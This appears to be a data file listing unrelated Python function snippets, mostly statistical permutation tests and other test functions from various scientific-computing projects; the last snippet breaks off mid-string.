"def test_distance_matrix_permutation_test_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return (\r\n [distance_matrix_permutation_test(*args)[2] for i in range(10)]\r\n )\r\n\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n n = 100\r\n\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='high')\r\n self.assertSimilarMeans(r, 0.77281447417149496, 0)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n\r\n # The following lines are not part of the test code, but are useful in\r\n # figuring out what t-scores all of the permutations will yield.\r\n # permutes = [[0, 1, 2], [0, 2, 1], [1, 0, 2],\\\r\n # [1, 2, 0], [2, 0, 1], [2, 1, 0]]\r\n #results = []\r\n # for p in permutes:\r\n # p_m = permute_2d(m,p)\r\n # results.append(t_two_sample(\\\r\n # [p_m[0,1],p_m[0,2]],[p_m[2,1]],tails='high'))\r\n # print results\r", "def test_T2():", "def test_T2():", "def _test(self, **kwargs):\n raise ValueError(\"This function is not available in lazy results evaluation as it would \"\n \"require all pairwise tests to be performed.\")", "def _run_permutation(self, params):\n iter_df, iter_xyz = params\n iter_xyz = np.squeeze(iter_xyz)\n iter_df[[\"x\", \"y\", \"z\"]] = iter_xyz\n stat_values = self._compute_summarystat(iter_df)\n return stat_values", "def distribute_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n output: str,\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n procs: int = os.cpu_count(),\r\n single: bool = False,\r\n fdr: bool = False\r\n) -> None:\r\n\r\n client = get_client()\r\n\r\n log._logger.info('Scattering data to workers...')\r\n\r\n ## Scatter data onto workers\r\n [matrix] = client.scatter([matrix], broadcast=True)\r\n [uids] = client.scatter([uids], broadcast=True)\r\n futures = []\r\n\r\n if single:\r\n seeds = [seeds] # type: ignore\r\n\r\n for s in seeds:\r\n\r\n log._logger.info('Running permutation tests...')\r\n\r\n permuted_futures = []\r\n s = client.scatter([s], broadcast=True)\r\n\r\n ## Split the number of permutations evenly\r\n for chunk in np.array_split(np.zeros(permutations), procs):\r\n\r\n prox_vector_future = client.submit(\r\n _run_individual_permutation_tests,\r\n matrix,\r\n s,\r\n uids,\r\n len(chunk),\r\n alpha,\r\n pure=False,\r\n single=single\r\n )\r\n\r\n permuted_futures.append(prox_vector_future)\r\n\r\n futures.append(permuted_futures)\r\n\r\n log._logger.info('Calculating p-values...')\r\n\r\n ## Wait for testing to finish\r\n for i, test in enumerate(futures):\r\n\r\n ## Gather the results of the permutation tests for this specific seed node\r\n test = client.gather(test)\r\n ## Get the first test so we keep the node_from, node_to, and prob. columns and\r\n ## concat the walk scores from the rest.\r\n prox_vector = test.pop(0)\r\n\r\n ## Get rid of node_from, node_to, prob. 
columns from the rest of the tests and\r\n ## only keep their permuted walk scores\r\n for df in test:\r\n prox_vector = pd.concat([\r\n prox_vector,\r\n df.drop(columns=['node_from', 'node_to', 'probability'])\r\n ], axis=1)\r\n\r\n ## Calculate the p-value\r\n prox_vector = _calculate_p(prox_vector, permutations)\r\n\r\n ## FDR adjusted p-values\r\n if fdr:\r\n prox_vector = _adjust_fdr(prox_vector)\r\n\r\n ## Create a new file if necessary\r\n if i == 0:\r\n _make_ness_header_output(output, p=True, q=fdr)\r\n\r\n ## Save the output\r\n _append_ness_output(output, prox_vector)", "def test_T4():", "def test_T4():", "def test_T1():", "def test_T1():", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations)", "def test_T01():", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations, verbose=self.verbose)", "def _run_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n single: bool = False\r\n) -> pd.DataFrame:\r\n\r\n ## First get the proximity vector for the walk\r\n prox_vector = _run_individual_walks(matrix, seeds, uids, alpha, single=single)\r\n\r\n ## Start the permutation testing\r\n for i in range(permutations):\r\n\r\n ## Shuffle the node labels\r\n permuted_uids = graph.shuffle_node_labels(uids)\r\n\r\n ## Run the permuted walk\r\n permuted_vector = _run_individual_walks(\r\n matrix, seeds, permuted_uids, alpha, single=single\r\n )\r\n\r\n ## Join on the original results\r\n prox_vector[f'p_{i}'] = permuted_vector.probability\r\n\r\n return prox_vector", "def test_perform_pairwise_tests_multi_comp(self):\r\n # Verified with R's t.test function.\r\n exp = [['foo', 'bar', -6.5999999999999996, 0.0070804795641244006,\r\n 0.021241438692373202, nan, nan], ['foo', 'baz',\r\n -\r\n 9.7979589711327115, 0.00060818494446333643, 0.0018245548333900093,\r\n nan, nan], ['bar', 'baz', -3.0, 0.05766888562243732,\r\n 0.17300665686731195, nan, nan]]\r\n obs = _perform_pairwise_tests(self.labels2, self.dists2, 'two-sided',\r\n 0)\r\n self.compare_multiple_level_array(obs, exp)", "def paired_permutation_test(D1, a, b, tradeoff, threshold=0.05, R=10000, verbose=1):\n\n # extract the scores by example for each system\n A = D1[D1.policy == a]\n B = D1[D1.policy == b]\n assert (A.example == B.example).all()\n assert (A.index == B.index).all()\n\n W = B.want.sum() # number of thing we want is constant among permutations\n n = len(A.index)\n\n AC = np.array(A.want_and_got) * 1.0\n AG = np.array(A.got) * 1.0\n A_runtime = np.array(A.pushes) * 1.0\n\n BC = np.array(B.want_and_got) * 1.0\n BG = np.array(B.got) * 1.0\n B_runtime = np.array(B.pushes) * 1.0\n\n # observed value of test statistic -- the difference of rewards.\n T_observed = test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n np.zeros(n, dtype=np.int32), W, tradeoff)\n\n r = 0.0\n for _ in iterview(range(R), msg='perm test'):\n # randomly generate a vector of zeros and ones (uniformly).\n # Note: endpoint not included in np.random.randit (that's why theres a 2).\n flip = np.random.randint(0, 2, size=n).astype(np.int32)\n if test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n flip, W, tradeoff) >= T_observed:\n r += 1\n s = (r+1)/(R+1)\n\n # observed rewards\n ra = cgw_f(AC.sum(), AG.sum(), W) - 
tradeoff*A_runtime.mean()\n rb = cgw_f(BC.sum(), BG.sum(), W) - tradeoff*B_runtime.mean()\n\n if verbose:\n # which system has higher reward? is it significant?\n asig = (red % bold) if ra > rb and s <= 0.05 else '%s'\n bsig = (blue % bold) if rb > ra and s <= 0.05 else '%s'\n any_sig = bold if s <= threshold else yellow\n\n print asig % 'R(A) = %g (%s)' % (ra, a)\n print bsig % 'R(B) = %g (%s)' % (rb, b)\n print any_sig % 'confidence = %g' % (1-s)\n print\n\n if s <= threshold:\n return s, -1 if ra > rb else +1\n else:\n return s, 0 # \"statistical tie\"", "def permutation_is_valid(permutation):\n pass", "def run_paired_t(data_generator):\r\n test_stats, pvals = [], []\r\n for b_data, a_data in data_generator:\r\n test_stat, pval = t_paired(b_data, a_data)\r\n test_stats.append(test_stat)\r\n pvals.append(pval)\r\n return test_stats, pvals", "def par_test_2(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = [\n self.XYZ_factor.mult(self.scalar),\n self.XYZ_factor.mult(self.scalarf),\n self.scalarf.mult(self.XYZ_factor),\n ]\n\n par_res = [\n self.XYZ_par_factor.mult(self.scalar),\n self.XYZ_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XYZ_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )", "def ParallelToserial(self):\n pass", "def permutation_test_mat(matrix,\n n_1, n_2, n_permutations,\n a00=1, a11=1, a01=0):\n n = n_1 + n_2\n pi = np.zeros(n, dtype=np.int8)\n pi[n_1:] = 1\n\n larger = 0.\n count = 0\n \n for sample_n in range(1 + n_permutations):\n count = 0.\n for i in range(n):\n for j in range(i, n):\n mij = matrix[i, j] + matrix[j, i]\n if pi[i] == pi[j] == 0:\n count += a00 * mij\n elif pi[i] == pi[j] == 1:\n count += a11 * mij\n else:\n count += a01 * mij\n if sample_n == 0:\n statistic = count\n elif statistic <= count:\n larger += 1\n\n np.random.shuffle(pi)\n\n return larger / n_permutations", "def test_make_mul_transp():\n tmp_dir = make_temp_dir()\n FILE_NAME = \"tmp_test_mul_transp\"\n NAME = os.path.join(tmp_dir, FILE_NAME)\n C_NAME, EXE_NAME = NAME + \".c\", NAME + \".exe\"\n \n def make_testprogram(lv, lm, n=1):\n generate = BitMatrixMulTransp().generate_c_mul_transp\n f = open(C_NAME, \"wt\")\n print(r\"\"\"#include <stdio.h>\n#include <stdint.h>\nint main(int argc, char **argv)\n{{\n uint_fast32_t i, v;\n static uint_fast32_t a[1000];\n sscanf(argv[1], \"%ld\", &v);\n for (i=0; i < argc-2; ++i) sscanf(argv[i+2], \"%ld\", a+i);\n {0}\n printf(\"%ld\\n\",v);\n return 0;\n}}\n\"\"\".format(generate(\"v\", \"a\", lv, lm, n)), file = f)\n f.close()\n #subprocess.check_output([\"gcc\", C_NAME, \"-o\", EXE_NAME])\n compile_testprogramm([C_NAME], EXE_NAME)\n checker = BitMatrixMulTransp()\n checker.set_matrix(lv, lm, n)\n return checker\n\n def run_testprogram(v, m):\n data = list(map(str, [v]+m)) \n res = subprocess.check_output([EXE_NAME] + data)\n return int(res) \n\n def test_testprogram(checker , v, m):\n res = run_testprogram(v, m)\n ref = checker.compute(v,m+[0]*64)\n assert ref == ref, (hex, ref)\n\n def del_testprogram():\n for f in [C_NAME, EXE_NAME]:\n os.remove(f)\n\n test_data_dict = {\n (4,4,1,0): [ (3, [2,3, 1, 1]) , ]\n }\n\n def test_data(lv, lm, n, n_tests=10):\n \"\"\"yield n_tests test cases (v, m) for given lv, lm, m0\"\"\"\n try:\n d = test_data_dict[(lv, lm, n, m0)]\n for v, m in d: yield v, m\n except:\n pass\n for i in range(n_tests):\n v = random.randint(0, 2**(n*lv)-1)\n m = [] 
\n for i in range(lm):\n m.append(random.randint(0, 2**(n*lv)-1))\n yield v, m\n\n def test_programs():\n \"\"\"yield cases (lv, lm, n) for a making a test program\"\"\"\n yield 4, 4, 1\n yield 16, 12, 2\n\n \n\n \n for lv, lm, n in test_programs():\n print(\"Make C program for case lv=%d, lm=%d, n=%d\" % (\n lv,lm,n))\n checker = make_testprogram(lv, lm, n) \n print (\"C program has been made, starting tests..\")\n for v, m in test_data(lv, lm, n):\n test_testprogram(checker, v, m)\n del_testprogram()\n print (\"passed\")\n\n kill_temp_dir(tmp_dir)", "def test(self, inputs, reps=1000, workers=-1):\n\n # calculate observed test statistic\n u, v = k_sample_transform(inputs)\n self.u = u\n self.v = v\n obs_stat = self.indep_test._statistic(u, v)\n\n # use all cores to create function that parallelizes over number of reps\n mapwrapper = MapWrapper(workers)\n null_dist = np.array(list(mapwrapper(self._perm_stat, range(reps))))\n self.null_dist = null_dist\n\n # calculate p-value and significant permutation map through list\n pvalue = (null_dist >= obs_stat).sum() / reps\n\n # correct for a p-value of 0. This is because, with bootstrapping\n # permutations, a p-value of 0 is incorrect\n if pvalue == 0:\n pvalue = 1 / reps\n self.pvalue = pvalue\n\n return obs_stat, pvalue", "def test_tdma():\n a = np.array([0,1,1])\n b = np.array([1,1,1])\n c = np.array([2,1,0])\n d = np.array([5,6,5])\n x = tdma(a,b,c,d)\n print \"x= \", x\n a = np.array([0,1,1])\n b = np.array([1,1,1])\n c = np.array([2,1,0])\n d = np.array([5,6,5])\n x2 = tripiv(a, b, c, d)\n print \"x2= \", x2\n \n return x, x2", "def parallel_batch_testing(subject_array, batch_size, typeII_error, typeI_error, parallel_num, ind_repeat, seq):\n\n\n\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array)/batch_size)* parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(subject_array)/batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in (temp_batch[:, 1]):\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n else:\n if random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])\n\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch, typeII_error, typeI_error,\n repeat = ind_repeat, seq = seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, batch_consum+individual_con, individual_con)", "def nextPermutation(self, nums: List[int]) -> None:\n pass", "def test_transpose(self):\n funcs = ['transpose', 'transpose_']\n for func in funcs:\n tensor = get_random_test_tensor()\n encrypted = SharedTensor(tensor)\n reference = getattr(tensor, func)(0, 1)\n encrypted_out = getattr(encrypted, func)(0, 1)\n msg = 'private %s failed' % func\n self._check(encrypted_out, reference, msg)\n if '_' in func:\n # Check in-place op worked\n self._check(encrypted, reference, msg)\n else:\n # Check original is not modified\n self._check(encrypted, tensor, msg)\n\n # Check property\n tensor = get_random_test_tensor()\n encrypted = SharedTensor(tensor)\n self._check(encrypted.T, tensor.T, msg)", "def tes_mod(self):\r\n x, y = ints('xy')\r\n fn = gof.DualLinker().accept(FunctionGraph([x,y], 
[x%y])).make_function()\r\n for a,b in ((0,1), (1,1), (0,-1), (1,-1), (-1,-1),\r\n (1,2), (-1,2), (1,-2), (-1,-2),\r\n (5,3), (-5,3), (5,-3), (-5,-3)\r\n ):\r\n self.assertTrue(fn(a,b) == a%b, (a,))", "def test_partial_tucker():\n rng = check_random_state(1234)\n tol_norm_2 = 10e-3\n tol_max_abs = 10e-1\n tensor = T.tensor(rng.random_sample((3, 4, 3)))\n modes = [1, 2]\n core, factors = partial_tucker(tensor, modes, ranks=None, n_iter_max=200, verbose=True)\n reconstructed_tensor = multi_mode_dot(core, factors, modes=modes)\n norm_rec = T.norm(reconstructed_tensor, 2)\n norm_tensor = T.norm(tensor, 2)\n T.assert_((norm_rec - norm_tensor)/norm_rec < tol_norm_2)\n\n # Test the max abs difference between the reconstruction and the tensor\n T.assert_(np.max(np.abs(norm_rec - norm_tensor)) < tol_max_abs)\n\n # Test the shape of the core and factors\n ranks = [3, 1]\n core, factors = partial_tucker(tensor, modes=modes, ranks=ranks, n_iter_max=100, verbose=1)\n for i, rank in enumerate(ranks):\n T.assert_equal(factors[i].shape, (tensor.shape[i+1], ranks[i]),\n err_msg=\"factors[{}].shape={}, expected {}\".format(\n i, factors[i].shape, (tensor.shape[i+1], ranks[i])))\n T.assert_equal(core.shape, [tensor.shape[0]]+ranks, err_msg=\"Core.shape={}, \"\n \"expected {}\".format(core.shape, [tensor.shape[0]]+ranks))", "def test_all_pairs_t_test(self):\r\n # We aren't testing the numeric values here, as they've already been\r\n # tested in the functions that compute them. We are interested in the\r\n # format of the returned string.\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# The nonparametric p-values were calculated using 999 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. 
no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\t0.095\t0.285\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\t0.101\t0.303\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\t0.217\t0.651\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def _perm_stat(self, index): # pragma: no cover\n\n permu = np.random.permutation(self.u)\n permv = np.random.permutation(self.v)\n\n # calculate permuted statics, store in null distribution\n perm_stat = self.indep_test._statistic(permu, permv)\n\n return perm_stat", "def testEjemploTp(self):\n azul = [0, 4, 5, 0]\n rojo = [1, 7, 4, 0]\n amarillo = [3, 6, 8, 0]\n negro = [6, 10, 10, 0]\n magenta = [7, 8, 12, 0]\n verde = [9, 11, 11, 0]\n perfiles = []\n perfiles.append(azul)\n perfiles.append(rojo)\n perfiles.append(amarillo)\n perfiles.append(negro)\n perfiles.append(magenta)\n perfiles.append(verde)\n perfil = Perfil.Perfil()\n resultadoEsperado = [0, 4, 1, 7, 4, 6, 6, 10, 9, 11, 11, 8, 12]\n for x in range(10000):\n inicial = random_integers(6, 0)\n inicial = inicial*4\n perfilOriginal = []\n for i in range (inicial, len(perfiles)+inicial, 1):\n perfilOriginal += perfiles[i%len(perfiles)]\n \n resultado = perfil.calcularPerfil(perfilOriginal, 0)\n self.assertEqual(resultadoEsperado, resultado)", "def test_p_tilda(self, test_inputs, random_inputs, training):\n \n self.batch_size = test_inputs.shape[0]\n \n self.num_samples = random_inputs.shape[0]\n \n self.add_p_tilda(training = training)\n \n var_list = [self.x, self.x_tilda]\n \n get_p_tilda = theano.function(inputs = var_list,\n outputs= self.p_tilda)\n \n probs = get_p_tilda(test_inputs, random_inputs)\n \n si = self.batch_size+self.np_rand_gen.choice(self.num_samples, 10, False)\n \n return probs[0:self.batch_size], probs[si]", "def test_all_pairs_t_test_invalid_tests(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (high) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean > Group 2 mean\r\n# The nonparametric p-values were calculated using 20 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\tN/A\tN/A\tN/A\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(['foo', 'bar'], [[], [1, 2, 4]],\r\n 'high', 20)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_euclidean_parallel_transport(self):\n \n self._test_parallel_transport(k=0)", "def test_distance_matrix_permutation_test_return_scores(self):\r\n # use alt statistical test to make results simple\r\n def fake_stat_test(a, b, tails=None):\r\n return 42., 42.\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n self.assertEqual(distance_matrix_permutation_test(\r\n m, [(0, 0), (0, 1), (0, 2)],\r\n n=5, f=fake_stat_test, return_scores=True), (42., 42., 0., [42.] 
* 5))", "def par_test_14(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def section_4_9():\n from itertools import permutations\n from itertools import combinations\n from itertools import combinations_with_replacement\n\n items = ['a', 'b', 'c']\n\n def test1():\n for p in permutations(items):\n print(p)\n\n def test2():\n for p in combinations(items, 3):\n print(p)\n print()\n for p in combinations(items, 2):\n print(p)\n print()\n for p in combinations(items, 1):\n print(p)\n print()\n for p in combinations_with_replacement(items, 3):\n print(p)", "def test_mutation(self):\n genotype = '0|0|2|0|0|2|0|0 1|0|0|1|1|0|0|0 0|1|0|0|0|0|2|1--1 7'\n search_space = {'dil_conv_3x3', 'dil_conv_5x5', 'dil_conv_7x7',\n 'skip_connect', 'clinc_3x3', 'clinc_7x7', 'avg_pool_3x3', 'max_pool_3x3'}\n\n mutator = Mutations(search_space, prob_mutation=0.8,\n prob_resize=0.99, prob_swap=0.99)\n mutated_g = mutator(genotype)\n mutated_g = mutator(mutated_g)\n mutated_g = mutator(mutated_g)\n a, s, d = get_conf(mutated_g)\n print('---->', mutated_g)\n self.assertGreaterEqual(10, d)\n self.assertTrue(s in (0, 1))\n a = torch.tensor(a)\n d = int((a.shape[0]*2)**.5)\n start = 0\n for i in range(d):\n end = int((i+1)*(i+2)/2)\n self.assertTrue(a[start:end, :].sum() > 0)\n start = end", "def permute_via_gather(val, permutation, inverse_permutation, axis=0):\n # It is *not* safe to use jax.custom_vjp here. The most likely cause is that\n # it can't close over values: https://github.com/google/jax/issues/2676\n # The error only occurs in some configurations (e.g. use_python_loop = True,\n # num_parallel_heads = 1) but not others.\n permutation = jax.lax.stop_gradient(permutation)\n inverse_permutation = jax.lax.stop_gradient(inverse_permutation)\n def permute_impl(val):\n return jnp.take(val, permutation, axis=axis)\n def permute_vjp(val):\n permuted = permute_impl(jax.lax.stop_gradient(val))\n def vjpfun(permuted_grad):\n # JAX autodiff would synthesize a scatter operation because it doesn't\n # know that the indices are a permutatation. However on TPU, gathers are\n # faster than scatters (at least in the regime the LSH attention uses).\n return (jnp.take(permuted_grad, inverse_permutation, axis=axis),)\n return permuted, vjpfun\n permute = jax.custom_transforms(permute_impl)\n jax.defvjp_all(permute, permute_vjp)\n return permute(val)", "def cell_permutation(self):\n\n self.log.info(\"Begin Sample Permutation Analysis.\")\n\n # Initialize some variables.\n self.seg_analyzer.break_points(permutation=True)\n permutation_list = self.seg_analyzer.sample_names\n # cell_permutation_data_dict = defaultdict(lambda: defaultdict(list))\n odds_string = \"\"\n unique_targeted_odds_ratio_list = []\n total_targeted_odds_ratio_list = []\n total_targeted_del_odds_ratio_list = []\n total_targeted_ins_odds_ratio_list = []\n unique_targeted_ins_odds_ratio_list = []\n unique_targeted_del_odds_ratio_list = []\n\n # Run a loop for the iterations. 
Shuffle the list and make a copy for each loop.\n\n for i in range(int(self.args.Iteration_Count)):\n numpy.random.shuffle(permutation_list)\n shuffled_permutation_list = permutation_list\n sub_list = []\n count = 0\n\n if i % int(self.args.Prog_Check) == 0:\n self.log.info(\"Iteration {0} of {1} for Sample Permutation Analysis.\"\n .format(i, self.args.Iteration_Count))\n\n # Pybedtools keeps all temporary files until Python exits. This helps keep the disk clean.\n pybedtools.cleanup()\n\n # Create a list with two unique, random lists of indices.\n while count < 2:\n n = (numpy.random.choice(shuffled_permutation_list, int(self.args.Sample_Group_Size), replace=False))\n\n # Remove the first set from the list\n shuffled_permutation_list = list(set(shuffled_permutation_list).difference(n))\n sub_list.append(n)\n count += 1\n\n # Retrieve a namedtuple of the permuted samples\n d0 = self.seg_analyzer.target_intersection(sub_list[0])\n d1 = self.seg_analyzer.target_intersection(sub_list[1])\n\n # cell_permutation_data_dict[0]['del'].append([d0.total_del, d0.total_targeted_del_breakpoints,\n # d0.total_unique_del, d0.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[1]['del'].append([d1.total_del, d1.total_targeted_del_breakpoints,\n # d1.total_unique_del, d1.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[0]['ins'].append([d0.total_ins, d0.total_targeted_ins_breakpoints,\n # d0.total_unique_ins, d0.unique_targeted_ins_breakpoints])\n #\n # cell_permutation_data_dict[1]['ins'].append([d1.total_ins, d1.total_targeted_ins_breakpoints,\n # d1.total_unique_ins, d1.unique_targeted_ins_breakpoints])\n\n total_breakpoint0 = d0.total_del+d0.total_ins\n total_targeted0 = d0.total_targeted_del_breakpoints+d0.total_targeted_ins_breakpoints\n total_unique_breakpoint0 = d0.total_unique_del+d0.total_unique_ins\n total_unique_targeted0 = d0.unique_targeted_del_breakpoints+d0.unique_targeted_ins_breakpoints\n\n total_breakpoint1 = d1.total_del+d1.total_ins\n total_targeted1 = d1.total_targeted_del_breakpoints+d1.total_targeted_ins_breakpoints\n total_unique_breakpoint1 = d1.total_unique_del+d1.total_unique_ins\n total_unique_targeted1 = d1.unique_targeted_del_breakpoints+d1.unique_targeted_ins_breakpoints\n\n total_target_ratio0 = total_targeted0/total_breakpoint0\n total_target_ratio1 = total_targeted1/total_breakpoint1\n\n total_target_odds = total_target_ratio0/total_target_ratio1\n\n unique_target0 = total_unique_targeted0/total_unique_breakpoint0\n unique_target1 = total_unique_targeted1/total_unique_breakpoint1\n\n unique_target_odds = unique_target0/unique_target1\n\n try:\n del_target_odds = \\\n (d0.total_del/d0.total_targeted_del_breakpoints)/(d1.total_del/d1.total_targeted_del_breakpoints)\n except ZeroDivisionError:\n del_target_odds = 0\n try:\n udel_target_odds = \\\n (d0.unique_targeted_del_breakpoints / d0.total_unique_del) / (d1.unique_targeted_del_breakpoints /\n d1.total_unique_del)\n except ZeroDivisionError:\n udel_target_odds = 0\n try:\n ins_target_odds = \\\n (d0.total_targeted_ins_breakpoints/d0.total_ins)/(d1.total_targeted_ins_breakpoints/d1.total_ins)\n except ZeroDivisionError:\n ins_target_odds = 0\n try:\n uins_target_odds = \\\n (d0.unique_targeted_ins_breakpoints / d0.total_unique_ins) / (d1.unique_targeted_ins_breakpoints /\n d1.total_unique_ins)\n except ZeroDivisionError:\n uins_target_odds = 0\n\n total_targeted_odds_ratio_list.append(total_target_odds)\n unique_targeted_odds_ratio_list.append(unique_target_odds)\n 
total_targeted_del_odds_ratio_list.append(del_target_odds)\n total_targeted_ins_odds_ratio_list.append(ins_target_odds)\n unique_targeted_del_odds_ratio_list.append(udel_target_odds)\n unique_targeted_ins_odds_ratio_list.append(uins_target_odds)\n\n odds_string += \\\n \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\" \\\n \"\\t{}\\t{}\\t{}\\t{}\\t{}\\n\"\\\n .format(total_target_odds, unique_target_odds, del_target_odds, udel_target_odds, ins_target_odds,\n uins_target_odds, total_breakpoint0, d0.total_del, d0.total_ins, total_targeted0,\n d0.total_targeted_del_breakpoints, d0.total_targeted_ins_breakpoints, total_unique_breakpoint0,\n d0.total_unique_del, d0.total_unique_ins, total_unique_targeted0,\n d0.unique_targeted_del_breakpoints, d0.unique_targeted_ins_breakpoints, total_breakpoint1,\n d1.total_del, d1.total_ins, total_targeted1, d1.total_targeted_del_breakpoints,\n d1.total_targeted_ins_breakpoints, total_unique_breakpoint1, d1.total_unique_del,\n d1.total_unique_ins, total_unique_targeted1, d1.unique_targeted_del_breakpoints,\n d1.unique_targeted_ins_breakpoints)\n\n odds_labels = \"Total Targeted\\tUnique Targeted\\tDel Targeted\\tUnique Del Targeted\\tIns Targeted\\t\" \\\n \"Unique Ins Targeted\\tSample_0 Total\\tSample_0 tDel\\tSample_0 tIns\\tSample_0 Targeted\\t\" \\\n \"Sample_0 tDel Targeted\\tSample_0 tIns Targeted\\tSample_0 Unique\\tSample_0 uDel\\tSample_0 uIns\\t\"\\\n \"Sample_0 uTargeted\\tSample_0 uDel Targeted\\tSample_0 uIns Targeted\\tSample_1 Total\\t\" \\\n \"Sample_1 tDel\\tSample_1 tIns\\tSample_1 Targeted\\tSample_1 tDel Targeted\\t\" \\\n \"Sample_1 tIns Targeted\\tSample_1 Unique\\tSample_1 uDel Targeted\\tSample_1 uIns Targeted\\n\"\n\n total_odds_mean = round(scipy.mean(total_targeted_odds_ratio_list), 2)\n del_odds_mean = round(scipy.mean(total_targeted_del_odds_ratio_list), 2)\n ins_odds_mean = round(scipy.mean(total_targeted_ins_odds_ratio_list), 2)\n\n unique_odds_mean = round(scipy.mean(unique_targeted_odds_ratio_list), 2)\n unique_del_odds_mean = round(scipy.mean(unique_targeted_del_odds_ratio_list), 2)\n unique_ins_odds_mean = round(scipy.mean(unique_targeted_ins_odds_ratio_list), 2)\n\n total975 = numpy.percentile(total_targeted_odds_ratio_list, 97.5, interpolation='linear')\n total25 = numpy.percentile(total_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n del975 = numpy.percentile(total_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n del25 = numpy.percentile(total_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n ins975 = numpy.percentile(total_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n ins25 = numpy.percentile(total_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_total975 = numpy.percentile(unique_targeted_odds_ratio_list, 97.5, interpolation='linear')\n unique_total25 = numpy.percentile(unique_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_del975 = numpy.percentile(unique_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n unique_del25 = numpy.percentile(unique_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_ins975 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n unique_ins25 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n outstring = \"Permutation Analysis Module v{}; {} Type Permutations run {}\\n\" \\\n \"Target File:\\t{}\\nSegCopy File:\\t{}\\n\\n\" \\\n 
